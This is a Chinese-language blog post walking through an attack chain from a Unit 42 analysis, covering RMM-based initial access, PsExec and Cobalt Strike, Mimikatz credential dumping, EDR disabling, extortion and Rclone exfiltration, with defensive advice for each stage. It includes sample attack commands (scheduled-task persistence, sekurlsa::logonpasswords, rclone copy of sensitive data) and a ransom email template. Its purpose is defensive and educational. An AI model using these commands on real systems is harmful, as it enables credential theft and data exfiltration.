網路攻擊的完整攻擊鏈


這張圖片來自 Palo Alto Networks 的 Unit 42 安全團隊的分析,是一個非常專業的攻擊鏈分析圖,展示了現代網絡攻擊的複雜性和系統性。攻擊者使用了多種工具和技術,從初始訪問到最終的數據竊取,每個步驟都經過精心策劃。

  • 初始訪問 (Initial Access via Atera)
    • Atera 是一個合法的 RMM(遠程監控和管理)工具,常被 IT 管理員用來遠程管理電腦。
    • 攻擊者從黑市購買被盜的 Atera 授權或訪問權限來入侵受害者網絡。
    • 利用合法工具進行非法訪問,這種手法稱為 “Living off the Land”。
    • 防護建議
      • 嚴格控制 RMM 工具的使用權限。
      • 監控異常的遠程連接。
      • 實施多因素認證(MFA)。

  • 橫向移動、持久性和命令控制 (Lateral Movement, Persistence and C2 Activity)
    • 攻擊者部署了 PsExec(一個系統管理工具), PsExec 是微軟的系統管理工具,可以在遠程系統上執行程序。
    • 在受害者網路中部署了 Cobalt Strike , 這是一套專業的滲透測試工具,常被攻擊者濫用。
    • 通過計劃任務定期執行這些惡意程序。
    • 攻擊示例:
    • # 使用 PsExec 在遠程主機執行命令
      psexec \\remote-pc -u admin -p password cmd.exe

      # 設置計劃任務保持持久性
      schtasks /create /tn “SystemUpdate” /tr “malware.exe” /sc daily /st 12:00

    • 防護建議
      • 限制橫向移動的能力(網絡分段)。
      • 監控可疑的計劃任務。
      • 實施最小權限原則。

  • 內部探索、憑證獲取和防禦規避 (Internal Discovery, Credential Access and Defense Evasion)
    • 在被入侵的域控制器上執行了一系列內部探索命令。
    • 使用 Mimikatz (強大的密碼提取工具) 和 LSASS dump 進程轉儲來獲取憑證(從 Windows 安全子系統提取憑證)。
    • 執行了一個名為 disabler.exe 的工具來禁用防毒/EDR 軟件。
    • 攻擊示例:
    • # 內部探索命令
      net group “Domain Admins” /domain
      nltest /dclist:domain

      # Mimikatz 命令
      privilege::debug
      sekurlsa::logonpasswords

    • 防護建議
      • 實施 Credential Guard。
      • 監控 LSASS 進程訪問。
      • 使用 PAM(特權訪問管理)。

  • 惡意機器連接 (Rogue Machines)
    • 攻擊者控制的惡意虛擬機連接到受害者的網路。
    • 繞過安全控制,從這些惡意機器上發現了多個惡意工具包。
    • 防護建議
      • 實施強制的設備註冊。
      • 使用 NAC(網絡訪問控制)。
      • 監控異常設備行為。

  • 勒索郵件 (Threat Actor Extortion Email)
    • 受害者收到來自攻擊者的勒索郵件。
    • 攻擊者聲稱已經獲取了網絡訪問權限並竊取了大量文件。
    • 典型勒索郵件格式
    • 主題:緊急 – 您的網絡已被入侵

      內容:
      我們已經獲取了您網絡的完整訪問權限,並下載了以下敏感數據:
      – 財務文件
      – 客戶數據
      – 內部文檔

    • 如果想要恢復數據,請支付 XX 比特幣到以下地址…

    • 防護建議
      • 定期備份關鍵數據。
      • 制定事件響應計劃。
      • 進行社工防範培訓。

  • 數據竊取 (Exfiltration)
    • 使用 Rclone 開源的雲存儲管理工具,從受害者網絡中竊取數據
    • 攻擊示例
    • # 使用 Rclone 竊取數據
      rclone copy /sensitive-data remote:backup

      # 常見的數據壓縮和加密
      7z a -p password stolen-data.7z /sensitive-data/*

    • 防護建議
      • 實施 DLP(數據洩露防護)
      • 監控異常的數據傳輸
      • 加密敏感數據

整體防護建議

  1. 預防措施
    • 實施零信任架構
    • 定期進行安全評估
    • 保持系統和軟件更新
  2. 檢測措施
    • 部署 EDR/XDR 解決方案
    • 實施 SIEM 系統
    • 進行持續的安全監控
  3. 響應措施
    • 制定詳細的事件響應計劃
    • 定期進行應急演練
    • 建立安全事件響應團隊
  4. 恢復措施
    • 維護離線備份
    • 制定業務連續性計劃
    • 定期測試恢復程序

這種攻擊鏈分析對於理解現代網絡威脅非常重要,它幫助組織:

  • 理解攻擊者的戰術和技術
  • 識別防禦中的薄弱環節
  • 優化安全控制措施
  • 提高整體安全態勢

在〈網路攻擊的完整攻擊鏈〉中有 1 則留言

發佈留言

發佈留言必須填寫的電子郵件地址不會公開。 必填欄位標示為 *

返回頂端